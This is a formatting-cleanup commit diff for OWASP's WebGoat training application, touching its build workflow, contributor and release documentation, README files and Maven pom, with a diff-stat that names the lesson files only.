 .../lessons/pathtraversal/PathTraversal.java  |   16 +-
 .../lessons/pathtraversal/ProfileUpload.java  |   45 +-
 .../pathtraversal/ProfileUploadBase.java      |  133 +-
 .../pathtraversal/ProfileUploadFix.java       |   46 +-
 .../ProfileUploadRemoveUserInput.java         |   33 +-
 .../pathtraversal/ProfileUploadRetrieval.java |  164 +-
 .../lessons/pathtraversal/ProfileZipSlip.java |  140 +-
 .../securepasswords/SecurePasswords.java      |   16 +-
 .../SecurePasswordsAssignment.java            |  132 +-
 .../lessons/spoofcookie/SpoofCookie.java      |   16 +-
 .../spoofcookie/SpoofCookieAssignment.java    |  126 +-
 .../lessons/spoofcookie/encoders/EncDec.java  |   84 +-
 .../advanced/SqlInjectionAdvanced.java        |   16 +-
 .../advanced/SqlInjectionChallenge.java       |   96 +-
 .../advanced/SqlInjectionChallengeLogin.java  |   54 +-
 .../advanced/SqlInjectionLesson6a.java        |  122 +-
 .../advanced/SqlInjectionLesson6b.java        |   80 +-
 .../advanced/SqlInjectionQuiz.java            |   75 +-
 .../introduction/SqlInjection.java            |   16 +-
 .../introduction/SqlInjectionLesson10.java    |  144 +-
 .../introduction/SqlInjectionLesson2.java     |   81 +-
 .../introduction/SqlInjectionLesson3.java     |   83 +-
 .../introduction/SqlInjectionLesson4.java     |   77 +-
 .../introduction/SqlInjectionLesson5.java     |  118 +-
 .../introduction/SqlInjectionLesson5a.java    |  160 +-
 .../introduction/SqlInjectionLesson5b.java    |  137 +-
 .../introduction/SqlInjectionLesson8.java     |  200 +--
 .../introduction/SqlInjectionLesson9.java     |  146 +-
 .../sqlinjection/mitigation/Servers.java      |   73 +-
 .../mitigation/SqlInjectionLesson10a.java     |   48 +-
 .../mitigation/SqlInjectionLesson10b.java     |  197 +--
 .../mitigation/SqlInjectionLesson13.java      |   58 +-
 .../mitigation/SqlInjectionMitigations.java   |   16 +-
 .../mitigation/SqlOnlyInputValidation.java    |   34 +-
 .../SqlOnlyInputValidationOnKeywords.java     |   41 +-
 .../org/owasp/webgoat/lessons/ssrf/SSRF.java  |   47 +-
 .../owasp/webgoat/lessons/ssrf/SSRFTask1.java |   60 +-
 .../owasp/webgoat/lessons/ssrf/SSRFTask2.java |   70 +-
 .../lessons/vulnerablecomponents/Contact.java |   23 +-
 .../vulnerablecomponents/ContactImpl.java     |    9 +-
 .../VulnerableComponents.java                 |   17 +-
 .../VulnerableComponentsLesson.java           |   62 +-
 .../WebGoatIntroduction.java                  |   48 +-
 .../lessons/webwolfintroduction/Email.java    |   11 +-
 .../LandingAssignment.java                    |   44 +-
 .../webwolfintroduction/MailAssignment.java   |   78 +-
 .../WebWolfIntroduction.java                  |   17 +-
 .../owasp/webgoat/lessons/xss/Comment.java    |   10 +-
 .../lessons/xss/CrossSiteScripting.java       |   16 +-
 .../xss/CrossSiteScriptingLesson1.java        |   19 +-
 .../xss/CrossSiteScriptingLesson3.java        |   79 +-
 .../xss/CrossSiteScriptingLesson4.java        |   44 +-
 .../xss/CrossSiteScriptingLesson5a.java       |  111 +-
 .../xss/CrossSiteScriptingLesson6a.java       |   32 +-
 .../xss/CrossSiteScriptingMitigation.java     |   16 +-
 .../lessons/xss/CrossSiteScriptingQuiz.java   |   68 +-
 .../lessons/xss/DOMCrossSiteScripting.java    |   39 +-
 .../xss/DOMCrossSiteScriptingVerifier.java    |   40 +-
 .../xss/stored/CrossSiteScriptingStored.java  |   16 +-
 .../StoredCrossSiteScriptingVerifier.java     |   30 +-
 .../lessons/xss/stored/StoredXssComments.java |  133 +-
 .../lessons/xxe/BlindSendFileAssignment.java  |  153 +-
 .../owasp/webgoat/lessons/xxe/Comment.java    |    9 +-
 .../webgoat/lessons/xxe/CommentsCache.java    |  175 +--
 .../webgoat/lessons/xxe/CommentsEndpoint.java |   17 +-
 .../lessons/xxe/ContentTypeAssignment.java    |   88 +-
 .../org/owasp/webgoat/lessons/xxe/Ping.java   |   44 +-
 .../owasp/webgoat/lessons/xxe/SimpleXXE.java  |   96 +-
 .../org/owasp/webgoat/lessons/xxe/User.java   |   29 +-
 .../org/owasp/webgoat/lessons/xxe/XXE.java    |   16 +-
 .../owasp/webgoat/server/ParentConfig.java    |    4 +-
 .../owasp/webgoat/server/StartWebGoat.java    |   21 +-
 .../owasp/webgoat/server/StartupMessage.java  |   28 +-
 .../org/owasp/webgoat/webwolf/FileServer.java |  142 +-
 .../webgoat/webwolf/MvcConfiguration.java     |   51 +-
 .../webgoat/webwolf/WebSecurityConfig.java    |   78 +-
 .../org/owasp/webgoat/webwolf/WebWolf.java    |    9 +-
 .../webgoat/webwolf/jwt/JWTController.java    |   47 +-
 .../owasp/webgoat/webwolf/jwt/JWTToken.java   |  207 +--
 .../owasp/webgoat/webwolf/mailbox/Email.java  |   54 +-
 .../webwolf/mailbox/MailboxController.java    |   39 +-
 .../webwolf/mailbox/MailboxRepository.java    |    6 +-
 .../webgoat/webwolf/requests/LandingPage.java |   27 +-
 .../webgoat/webwolf/requests/Requests.java    |  100 +-
 .../requests/WebWolfTraceRepository.java      |   54 +-
 .../webgoat/webwolf/user/UserRepository.java  |    2 +-
 .../webgoat/webwolf/user/UserService.java     |   33 +-
 .../webgoat/webwolf/user/WebGoatUser.java     |   81 +-
 .../webgoat/container/WebGoatApplication.java |    4 +-
 .../assignments/AssignmentEndpointTest.java   |   45 +-
 .../webgoat/container/plugins/LessonTest.java |   71 +-
 .../container/service/HintServiceTest.java    |   56 +-
 .../service/LessonMenuServiceTest.java        |  113 +-
 .../service/LessonProgressServiceTest.java    |  104 +-
 .../service/ReportCardServiceTest.java        |   92 +-
 .../container/session/LabelDebuggerTest.java  |   63 +-
 .../container/session/LessonTrackerTest.java  |  111 +-
 .../container/users/UserRepositoryTest.java   |   21 +-
 .../container/users/UserServiceTest.java      |   39 +-
 .../users/UserTrackerRepositoryTest.java      |  109 +-
 .../container/users/UserValidatorTest.java    |   85 +-
 .../authbypass/BypassVerificationTest.java    |   71 +-
 ...assRestrictionsFrontendValidationTest.java |   64 +-
 .../lessons/challenges/Assignment1Test.java   |  102 +-
 .../chromedevtools/ChromeDevToolsTest.java    |   49 +-
 .../webgoat/lessons/cia/CIAQuizTest.java      |  285 ++--
 .../ClientSideFilteringAssignmentTest.java    |   55 +-
 ...ClientSideFilteringFreeAssignmentTest.java |   64 +-
 .../clientsidefiltering/ShopEndpointTest.java |   76 +-
 .../lessons/cryptography/CryptoUtilTest.java  |   48 +-
 .../lessons/csrf/CSRFFeedbackTest.java        |   66 +-
 .../deserialization/DeserializeTest.java      |  146 +-
 .../HijackSessionAssignmentTest.java          |   98 +-
 ...jackSessionAuthenticationProviderTest.java |  111 +-
 .../HttpBasicsInterceptRequestTest.java       |  118 +-
 .../lessons/jwt/JWTDecodeEndpointTest.java    |   56 +-
 .../lessons/jwt/JWTFinalEndpointTest.java     |  109 +-
 .../lessons/jwt/JWTRefreshEndpointTest.java   |  330 ++--
 .../lessons/jwt/JWTSecretKeyEndpointTest.java |  187 +--
 .../lessons/jwt/JWTVotesEndpointTest.java     |  351 +++--
 .../owasp/webgoat/lessons/jwt/TokenTest.java  |   75 +-
 .../lessons/missingac/DisplayUserTest.java    |   25 +-
 .../MissingFunctionACHiddenMenusTest.java     |   73 +-
 .../missingac/MissingFunctionACUsersTest.java |   73 +-
 .../MissingFunctionACYourHashAdminTest.java   |   67 +-
 .../MissingFunctionYourHashTest.java          |   54 +-
 .../SecurityQuestionAssignmentTest.java       |  146 +-
 .../pathtraversal/ProfileUploadFixTest.java   |   82 +-
 .../ProfileUploadRemoveUserInputTest.java     |   81 +-
 .../ProfileUploadRetrievalTest.java           |  124 +-
 .../pathtraversal/ProfileUploadTest.java      |  133 +-
 .../SpoofCookieAssignmentTest.java            |  271 ++--
 .../spoofcookie/encoders/EncDecTest.java      |   74 +-
 .../lessons/sqlinjection/SqlLessonTest.java   |   17 +-
 .../SqlInjectionLesson10Test.java             |   63 +-
 .../introduction/SqlInjectionLesson2Test.java |   26 +-
 .../introduction/SqlInjectionLesson5Test.java |   77 +-
 .../SqlInjectionLesson5aTest.java             |   96 +-
 .../SqlInjectionLesson6aTest.java             |  121 +-
 .../SqlInjectionLesson6bTest.java             |   39 +-
 .../introduction/SqlInjectionLesson8Test.java |  107 +-
 .../introduction/SqlInjectionLesson9Test.java |  271 ++--
 .../mitigation/SqlInjectionLesson13Test.java  |  186 ++-
 .../SqlOnlyInputValidationOnKeywordsTest.java |   56 +-
 .../SqlOnlyInputValidationTest.java           |   49 +-
 .../owasp/webgoat/lessons/ssrf/SSRFTest1.java |   69 +-
 .../owasp/webgoat/lessons/ssrf/SSRFTest2.java |   56 +-
 .../VulnerableComponentsLessonTest.java       |  103 +-
 .../xss/CrossSiteScriptingLesson1Test.java    |   56 +-
 .../xss/DOMCrossSiteScriptingTest.java        |   65 +-
 .../lessons/xss/StoredXssCommentsTest.java    |   96 +-
 .../xxe/BlindSendFileAssignmentTest.java      |  291 ++--
 .../xxe/ContentTypeAssignmentTest.java        |  128 +-
 .../webgoat/lessons/xxe/SimpleXXETest.java    |   96 +-
 .../webgoat/webwolf/WebWolfApplication.java   |    4 +-
 .../webgoat/webwolf/jwt/JWTTokenTest.java     |  117 +-
 .../mailbox/MailboxControllerTest.java        |  154 +-
 .../mailbox/MailboxRepositoryTest.java        |   57 +-
 .../webgoat/webwolf/user/UserServiceTest.java |   54 +-
 336 files changed, 13921 insertions(+), 12688 deletions(-)

diff --git a/.github/stale.yml b/.github/stale.yml
index 619a771a4..1df9ad312 100644
--- a/.github/stale.yml
+++ b/.github/stale.yml
@@ -2,9 +2,9 @@
 daysUntilStale: 90
 daysUntilClose: 14
 onlyLabels:
-  - waiting-for-input
+  - waiting for input
   - wontfix
 staleLabel: stale
 markComment: >
   This issue has been automatically marked as `stale` because it has not had recent activity. :calendar: It will be _closed automatically_ in one week if no further activity occurs.
-closeComment: false
\ No newline at end of file
+closeComment: false
diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml
index 5376ac9b1..16a6cf2b8 100644
--- a/.github/workflows/build.yml
+++ b/.github/workflows/build.yml
@@ -47,6 +47,8 @@ jobs:
           path: ~/.m2
           key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
           restore-keys: ${{ runner.os }}-m2-
+      - name: Check code formatting
+        run: mvn --no-transfer-progress spotless:check
       - name: Build with Maven
         run: mvn --no-transfer-progress package
 
@@ -68,5 +70,8 @@ jobs:
               path: ~/.m2
               key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
               restore-keys: ubuntu-latest-m2-
+        - name: Check code formatting
+          #Fail fast
+          run: mvn --no-transfer-progress spotless:check
         - name: Test with Maven
           run: mvn --no-transfer-progress verify
diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index e1e172452..a6f530e5f 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -1,4 +1,5 @@
 # Contributing
+
 [![GitHub contributors](https://img.shields.io/github/contributors/WebGoat/WebGoat.svg)](https://github.com/WebGoat/WebGoat/graphs/contributors)
 ![GitHub issues by-label "help wanted"](https://img.shields.io/github/issues/WebGoat/WebGoat/help%20wanted.svg)
 ![GitHub issues by-label "good first issue"](https://img.shields.io/github/issues/WebGoat/WebGoat/good%20first%20issue.svg)
@@ -24,7 +25,7 @@ There are a couple of ways on how you can contribute to the project:
 Your PR is valuable to us, and to make sure we can integrate it smoothly, we have a few items for you to consider. In short:
 The minimum requirements for code contributions are:
 
-1. The code _must_ be compliant with the configured Checkstyle and PMD rules.
+1. The code _must_ be compliant with the configured Java Google Formatter, Checkstyle and PMD rules.
 2. All new and changed code _should_ have a corresponding unit and/or integration test.
 3. New and changed lessons _must_ have a corresponding integration test.
 4. [Status checks](https://docs.github.com/en/github/collaborating-with-pull-requests/collaborating-on-repositories-with-code-quality-features/about-status-checks) should pass for your last commit.
@@ -38,14 +39,13 @@ Pull requests should be as small/atomic as possible. Large, wide-sweeping change
 * If you are making spelling corrections in the docs, don't modify other files.
 * If you are adding new functions don't '*cleanup*' unrelated functions. That cleanup belongs in another pull request.
 
-
 ### Write a good commit message
 
 * Explain why you make the changes. [More infos about a good commit message.](https://betterprogramming.pub/stop-writing-bad-commit-messages-8df79517177d)
 
 * If you fix an issue with your commit, please close the issue by [adding one of the keywords and the issue number](https://docs.github.com/en/issues/tracking-your-work-with-issues/linking-a-pull-request-to-an-issue) to your commit message.
 
-  For example: `Fix #545` or `Closes #10`
+For example: `Fix #545` or `Closes #10`
 
 ## How to set up your Contributor Environment
 
@@ -54,27 +54,34 @@ Pull requests should be as small/atomic as possible. Large, wide-sweeping change
 3. Clone your own repository to your host computer so that you can make modifications. If you followed the GitHub tutorial from step 2, you have already done this.
 4. Go to the newly cloned directory "WebGoat" and add the remote upstream repository:
 
-    ```bash
-    $ git remote -v
-    origin git@github.com:<your Github handle>/WebGoat.git (fetch)
-    origin git@github.com:<your Github handle>/WebGoat.git (push)
+   ```bash
+   	$ git remote -v
+   	origin git@github.com:<your Github handle>/WebGoat.git (fetch)
+   	origin git@github.com:<your Github handle>/WebGoat.git (push)
 
-    $ git remote add upstream git@github.com:WebGoat/WebGoat.git
+   	$ git remote add upstream git@github.com:WebGoat/WebGoat.git
 
-    $ git remote -v
-    origin git@github.com:<your Github handle>/WebGoat.git (fetch)
-    origin git@github.com:<your Github handle>/WebGoat.git (push)
-    upstream git@github.com:OWASP/WebGoat.git (fetch)
-    upstream git@github.com:OWASP/WebGoat.git (push)
-    ```
+   	$ git remote -v
+   	origin git@github.com:<your Github handle>/WebGoat.git (fetch)
+   	origin git@github.com:<your Github handle>/WebGoat.git (push)
+   	upstream git@github.com:OWASP/WebGoat.git (fetch)
+   	upstream git@github.com:OWASP/WebGoat.git (push)
+   ```
+
+   See also the GitHub documentation on "[Configuring a remote for a fork](https://docs.github.com/en/free-pro-team@latest/github/collaborating-with-issues-and-pull-requests/configuring-a-remote-for-a-fork "Configuring a remote for a fork")".
 
-    See also the GitHub documentation on "[Configuring a remote for a fork](https://docs.github.com/en/free-pro-team@latest/github/collaborating-with-issues-and-pull-requests/configuring-a-remote-for-a-fork "Configuring a remote for a fork")".
 5. Choose what to work on, based on any of the outstanding [issues](https://github.com/WebGoat/WebGoat/issues "WebGoat Issues").
+
 6. Create a branch so that you can cleanly work on the chosen issue: `git checkout -b FixingIssue66`
+
 7. Open your favorite editor and start making modifications. We recommend using the [IntelliJ Idea](https://www.jetbrains.com/idea/).
+
 8. After your modifications are done, push them to your forked repository. This can be done by executing the command `git add MYFILE` for every file you have modified, followed by `git commit -m 'your commit message here'` to commit the modifications and `git push` to push your modifications to GitHub.
+
 9. Create a Pull Request (PR) by going to your fork, <https://github.com/Your_Github_Handle/WebGoat> and click on the "New Pull Request" button. The target branch should typically be the Master branch. When submitting a PR, be sure to follow the checklist that is provided in the PR template. The checklist itself will be filled out by the reviewer.
+
 10. Your PR will be reviewed and comments may be given. In order to process a comment, simply make modifications to the same branch as before and push them to your repository. GitHub will automatically detect these changes and add them to your existing PR.
+
 11. When starting on a new PR in the future, make sure to always keep your local repo up to date:
 
     ```bash
diff --git a/CREATE_RELEASE.md b/CREATE_RELEASE.md
index 9daf57065..1c37fd033 100644
--- a/CREATE_RELEASE.md
+++ b/CREATE_RELEASE.md
@@ -1,21 +1,21 @@
 ## Release WebGoat
 
-
 ### Version numbers
 
 For WebGoat we use milestone releases first before we release the official version, we use `v8.0.0.M3` while tagging
- and 8.0.0.M3 in the `pom.xml`. When we create the final release we remove the milestone release and use 
- `v8.0.0` in the `pom.xml`
- 
+and 8.0.0.M3 in the `pom.xml`. When we create the final release we remove the milestone release and use
+`v8.0.0` in the `pom.xml`
+
 ### Release notes:
-Update the release notes with the correct version. Use `git shortlog -s -n --since "SEP 31 2019"` for the list of 
+
+Update the release notes with the correct version. Use `git shortlog -s -n --since "SEP 31 2019"` for the list of
 committers.
 
 At the moment we use Gitflow, for a release you create a new release branch and take the following steps:
 
 ```
 git checkout develop
-git flow release start <version> 
+git flow release start <version>
 git flow release publish
 
 <<Make changes if necessary>>
@@ -30,5 +30,3 @@ git push --tags
 Now Travis takes over and will create the release in Github and on Docker Hub.
 
 NOTE: the `mvn versions:set` command above is just there to make sure the master branch contains the latest version
-
-
diff --git a/PULL_REQUEST_TEMPLATE.md b/PULL_REQUEST_TEMPLATE.md
index 8a74ce118..f419c6ef6 100644
--- a/PULL_REQUEST_TEMPLATE.md
+++ b/PULL_REQUEST_TEMPLATE.md
@@ -1 +1 @@
-Thank you for submitting a pull request to the WebGoat!
\ No newline at end of file
+Thank you for submitting a pull request to the WebGoat!
diff --git a/README.md b/README.md
index 7bfae574d..ecda99449 100644
--- a/README.md
+++ b/README.md
@@ -44,13 +44,12 @@ docker run -it -p 127.0.0.1:8080:8080 -p 127.0.0.1:9090:9090 -e TZ=Europe/Amster
 
 **Important**: *Choose the correct timezone, so that the docker container and your host are in the same timezone. As it is important for the validity of JWT tokens used in certain exercises.*
 
-
 ## 2. Standalone
 
 Download the latest WebGoat release from [https://github.com/WebGoat/WebGoat/releases](https://github.com/WebGoat/WebGoat/releases)
 
 ```shell
-java -Dfile.encoding=UTF-8 -Dwebgoat.port=8080 -Dwebwolf.port=9090 -jar webgoat-8.2.3.jar 
+java -Dfile.encoding=UTF-8 -Dwebgoat.port=8080 -Dwebwolf.port=9090 -jar webgoat-8.2.3.jar
 ```
 
 Click the link in the log to start WebGoat.
@@ -75,7 +74,7 @@ Now let's start by compiling the project.
 cd WebGoat
 git checkout <<branch_name>>
 # On Linux/Mac:
-./mvnw clean install 
+./mvnw clean install
 
 # On Windows:
 ./mvnw.cmd clean install
@@ -93,11 +92,11 @@ Now we are ready to run the project. WebGoat 8.x is using Spring-Boot.
 ./mvnw.cmd spring-boot:run
 
 ```
+
 ... you should be running WebGoat on http://localhost:8080/WebGoat momentarily.
 
 Note: The above link will redirect you to login page if you are not logged in. LogIn/Create account to proceed.
 
-
 To change the IP address add the following variable to the `WebGoat/webgoat-container/src/main/resources/application.properties` file:
 
 ```
@@ -109,6 +108,7 @@ server.address=x.x.x.x
 For specialist only. There is a way to set up WebGoat with a personalized menu. You can leave out some menu categories or individual lessons by setting certain environment variables.
 
 For instance running as a jar on a Linux/macOS it will look like this:
+
 ```Shell
 export EXCLUDE_CATEGORIES="CLIENT_SIDE,GENERAL,CHALLENGE"
 export EXCLUDE_LESSONS="SqlInjectionAdvanced,SqlInjectionMitigations"
@@ -120,3 +120,4 @@ Or in a docker run it would (once this version is pushed into docker hub) look l
 ```Shell
 docker run -d -p 8080:8080 -p 9090:9090 -e TZ=Europe/Amsterdam -e EXCLUDE_CATEGORIES="CLIENT_SIDE,GENERAL,CHALLENGE" -e EXCLUDE_LESSONS="SqlInjectionAdvanced,SqlInjectionMitigations" webgoat/webgoat
 ```
+
diff --git a/README_I18N.md b/README_I18N.md
index ef14f191b..6a4769f1e 100644
--- a/README_I18N.md
+++ b/README_I18N.md
@@ -22,7 +22,7 @@ The following steps are required when you want to add a new language
 4. Add a welcome page to the introduction lesson
    1. Copy Introduction_.adoc to Introduction_es.adoc (if in this case you want to add Spanish)
    2. Add a highlighted section that explains that most parts of WebGoat will still be in English and invite people to translate parts where it would be valuable
-5. Translate the main labels 
+5. Translate the main labels
    1. Copy messages.properties to messages_es.properties (if in this case you want to add Spanish)
    2. Translate the label values
 6. Optionally translate lessons by
diff --git a/RELEASE_NOTES.md b/RELEASE_NOTES.md
index 6263ff392..0e217e36e 100644
--- a/RELEASE_NOTES.md
+++ b/RELEASE_NOTES.md
@@ -1,4 +1,4 @@
-# WebGoat release notes 
+# WebGoat release notes
 
 ## Unreleased
 
@@ -6,14 +6,14 @@
 
 - New year's resolution: major refactoring of WebGoat to simplify the setup and improve building times.
 - Move away from multi-project setup:
-  - This has a huge performance benefit when building the application. Build time locally is now `Total time:  42.469 s` (depends on your local machine of course)
-  - No longer add Maven dependencies in several places
-  - H2 no longer needs to run as separate process, which solves the issue of WebWolf sharing and needing to configure the correct database connection.
+  * This has a huge performance benefit when building the application. Build time locally is now `Total time:  42.469 s` (depends on your local machine of course)
+  * No longer add Maven dependencies in several places
+  * H2 no longer needs to run as separate process, which solves the issue of WebWolf sharing and needing to configure the correct database connection.
 - More explicit paths in html files to reference `adoc` files, less magic.
 - Integrate WebWolf in WebGoat, the setup was way too complicated and needed configuration which could lead to mistakes and a not working application. This also simplifies the Docker configuration as there is only 1 Docker image.
 - Add WebWolf button in WebGoat
-- Move all lessons into `src/main/resources` 
-- WebGoat selects a port dynamically when starting. It will still start of port 8080 it will try another port to ease the user experience. 
+- Move all lessons into `src/main/resources`
+- WebGoat selects a port dynamically when starting. It will still start of port 8080 it will try another port to ease the user experience.
 - WebGoat logs URL after startup: `Please browse to http://127.0.0.1:8080/WebGoat to get started...`
 - Simplify `Dockerfile` as we no longer need a script to start everything
 - Maven build now start WebGoat jar with Maven plugin to make sure we run against the latest build.
@@ -35,7 +35,7 @@
 
 ### New functionality
 
-- Docker image now supports nginx when browsing to http://localhost a landing page is shown. 
+- Docker image now supports nginx when browsing to http://localhost a landing page is shown.
 
 ### Bug fixes
 
@@ -43,14 +43,12 @@
 - [#1031 SQL Injection (intro) 5: Data Control Language (DCL) the wiki's solution is not correct](https://github.com/WebGoat/WebGoat/issues/1031)
 - [#1027 Webgoat 8.2.1 Vulnerable_Components_12 Shows internal server error](https://github.com/WebGoat/WebGoat/issues/1027)
 
-
 ## Version 8.2.1
 
 ### New functionality
 
 - New Docker image for arm64 architecture is now available (for Apple M1)
 
-
 ## Version 8.2.0
 
 ### New functionality
@@ -85,11 +83,10 @@ Special thanks to the following contributors providing us with a pull request:
 - maximmasiutin
 - toshihue
 - avivmu
-- KellyMarchewa 
+- KellyMarchewa
 - NatasG
 - gabe-sky
 
-
 ## Version 8.1.0
 
 ### New functionality
@@ -97,27 +94,27 @@ Special thanks to the following contributors providing us with a pull request:
 - Added new lessons for cryptography and path-traversal
 - Extra content added to the XXE lesson
 - Explanation of the assignments will be part of WebGoat, in this release we added detailed descriptions on how to solve the XXE lesson. In the upcoming releases new explanations will be added. If you want to contribute please create a pull request on Github.
-- Docker improvements + docker stack for complete container with nginx 
-- Included JWT token decoding and generation, since jwt.io does not support None anymore 
+- Docker improvements + docker stack for complete container with nginx
+- Included JWT token decoding and generation, since jwt.io does not support None anymore
 
 ### Bug fixes
 
 - [#743 - Character encoding errors](https://github.com/WebGoat/WebGoat/issues/743)
 - [#811 -  Flag submission fails](https://github.com/WebGoat/WebGoat/issues/811)
 - [#810 - Scoreboard for challenges shows csrf users](https://github.com/WebGoat/WebGoat/issues/810)
-- [#788 - strange copy in constructor](https://github.com/WebGoat/WebGoat/issues/788) 
+- [#788 - strange copy in constructor](https://github.com/WebGoat/WebGoat/issues/788)
 - [#760 - Execution of standalone jar fails (Flyway migration step](https://github.com/WebGoat/WebGoat/issues/760)
 - [#766 - Unclear objective of vulnerable components practical assignment](https://github.com/WebGoat/WebGoat/issues/766)
 - [#708 - Seems like the home directory of WebGoat always use @project.version@](https://github.com/WebGoat/WebGoat/issues/708)
 - [#719 - WebGoat: 'Contact Us' email link in header is not correctly set](https://github.com/WebGoat/WebGoat/issues/719)
- - [#715 - Reset lesson doesn't reset the "HTML lesson" => forms stay succesful](https://github.com/WebGoat/WebGoat/issues/715)
- - [#725 - Vulnerable Components lesson 12 broken due to too new dependency](https://github.com/WebGoat/WebGoat/issues/725)
- - [#716 -  On M26 @project.version@ is not "interpreted" #7](https://github.com/WebGoat/WebGoat/issues/716)
- - [#721 couldn't be able to run CSRF lesson 3: Receive Whitelabel Error Page](https://github.com/WebGoat/WebGoat/issues/721)
- - [#724 - Dead link in VulnerableComponents lesson 11](https://github.com/WebGoat/WebGoat/issues/724)
- 
- ## Contributors
- 
+- [#715 - Reset lesson doesn't reset the "HTML lesson" => forms stay succesful](https://github.com/WebGoat/WebGoat/issues/715)
+- [#725 - Vulnerable Components lesson 12 broken due to too new dependency](https://github.com/WebGoat/WebGoat/issues/725)
+- [#716 -  On M26 @project.version@ is not "interpreted" #7](https://github.com/WebGoat/WebGoat/issues/716)
+- [#721 couldn't be able to run CSRF lesson 3: Receive Whitelabel Error Page](https://github.com/WebGoat/WebGoat/issues/721)
+- [#724 - Dead link in VulnerableComponents lesson 11](https://github.com/WebGoat/WebGoat/issues/724)
+
+## Contributors
+
 Special thanks to the following contributors providing us with a pull request:
 
 - Satoshi SAKAO
@@ -132,9 +129,5 @@ Special thanks to the following contributors providing us with a pull request:
 
 And everyone who provided feedback through Github.
 
-
 Team WebGoat
 
-
-
-
diff --git a/docs/README.md b/docs/README.md
index ec3085b27..6f0484341 100644
--- a/docs/README.md
+++ b/docs/README.md
@@ -2,4 +2,3 @@
 
 Old GitHub page which now redirects to OWASP website.
 
-
diff --git a/pom.xml b/pom.xml
index 3c07b76dd..21dcfc4c7 100644
--- a/pom.xml
+++ b/pom.xml
@@ -1,674 +1,726 @@
-<?xml version="1.0"?>
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
 
-    <modelVersion>4.0.0</modelVersion>
-    <groupId>org.owasp.webgoat</groupId>
-    <artifactId>webgoat</artifactId>
-    <packaging>jar</packaging>
-    <version>8.2.3-SNAPSHOT</version>
+  <modelVersion>4.0.0</modelVersion>
 
-    <parent>
-        <groupId>org.springframework.boot</groupId>
-        <artifactId>spring-boot-starter-parent</artifactId>
-        <version>2.7.1</version>
-    </parent>
+  <parent>
+    <groupId>org.springframework.boot</groupId>
+    <artifactId>spring-boot-starter-parent</artifactId>
+    <version>2.7.1</version>
+  </parent>
+  <groupId>org.owasp.webgoat</groupId>
+  <artifactId>webgoat</artifactId>
+  <version>8.2.3-SNAPSHOT</version>
+  <packaging>jar</packaging>
 
-    <name>WebGoat</name>
-    <description>WebGoat, a deliberately insecure Web Application</description>
-    <inceptionYear>2006</inceptionYear>
+  <name>WebGoat</name>
+  <description>WebGoat, a deliberately insecure Web Application</description>
+  <url>https://github.com/WebGoat/WebGoat</url>
+  <inceptionYear>2006</inceptionYear>
+  <organization>
+    <name>OWASP</name>
+    <url>https://github.com/WebGoat/WebGoat/</url>
+  </organization>
+  <licenses>
+    <license>
+      <name>GNU General Public License, version 2</name>
+      <url>https://www.gnu.org/licenses/gpl-2.0.txt</url>
+    </license>
+  </licenses>
+  <developers>
+    <developer>
+      <id>mayhew64</id>
+      <name>Bruce Mayhew</name>
+      <email>webgoat@owasp.org</email>
+      <organization>OWASP</organization>
+      <organizationUrl>https://github.com/WebGoat/WebGoat</organizationUrl>
+    </developer>
+    <developer>
+      <id>nbaars</id>
+      <name>Nanne Baars</name>
+      <email>nanne.baars@owasp.org</email>
+      <organizationUrl>https://github.com/nbaars</organizationUrl>
+      <timezone>Europe/Amsterdam</timezone>
+    </developer>
+    <developer>
+      <id>misfir3</id>
+      <name>Jason White</name>
+      <email>jason.white@owasp.org</email>
+    </developer>
+    <developer>
+      <id>zubcevic</id>
+      <name>René Zubcevic</name>
+      <email>rene.zubcevic@owasp.org</email>
+    </developer>
+    <developer>
+      <id>aolle</id>
+      <name>Àngel Ollé Blázquez</name>
+      <email>angel@olleb.com</email>
+    </developer>
+    <developer>
+      <id>jwayman</id>
+      <name>Jeff Wayman</name>
+      <email></email>
+    </developer>
+    <developer>
+      <id>dcowden</id>
+      <name>Dave Cowden</name>
+      <email></email>
+    </developer>
+    <developer>
+      <id>lawson89</id>
+      <name>Richard Lawson</name>
+      <email></email>
+    </developer>
+    <developer>
+      <id>dougmorato</id>
+      <name>Doug Morato</name>
+      <email>doug.morato@owasp.org</email>
+      <organization>OWASP</organization>
+      <organizationUrl>https://github.com/dougmorato</organizationUrl>
+      <timezone>America/New_York</timezone>
+      <properties>
+        <picUrl>https://avatars2.githubusercontent.com/u/9654?v=3&amp;s=150</picUrl>
+      </properties>
+    </developer>
+  </developers>
+
+  <mailingLists>
+    <mailingList>
+      <name>OWASP WebGoat Mailing List</name>
+      <subscribe>https://lists.owasp.org/mailman/listinfo/owasp-webgoat</subscribe>
+      <unsubscribe>Owasp-webgoat-request@lists.owasp.org</unsubscribe>
+      <post>owasp-webgoat@lists.owasp.org</post>
+      <archive>http://lists.owasp.org/pipermail/owasp-webgoat/</archive>
+    </mailingList>
+  </mailingLists>
+
+  <scm>
+    <connection>scm:git:git@github.com:WebGoat/WebGoat.git</connection>
+    <developerConnection>scm:git:git@github.com:WebGoat/WebGoat.git</developerConnection>
+    <tag>HEAD</tag>
     <url>https://github.com/WebGoat/WebGoat</url>
-    <organization>
-        <name>OWASP</name>
-        <url>https://github.com/WebGoat/WebGoat/</url>
-    </organization>
-    <licenses>
-        <license>
-            <name>GNU General Public License, version 2</name>
-            <url>https://www.gnu.org/licenses/gpl-2.0.txt</url>
-        </license>
-    </licenses>
-    <developers>
-        <developer>
-            <id>mayhew64</id>
-            <name>Bruce Mayhew</name>
-            <email>webgoat@owasp.org</email>
-            <organization>OWASP</organization>
-            <organizationUrl>https://github.com/WebGoat/WebGoat</organizationUrl>
-        </developer>
-        <developer>
-            <id>nbaars</id>
-            <name>Nanne Baars</name>
-            <email>nanne.baars@owasp.org</email>
-            <organizationUrl>https://github.com/nbaars</organizationUrl>
-            <timezone>Europe/Amsterdam</timezone>
-        </developer>
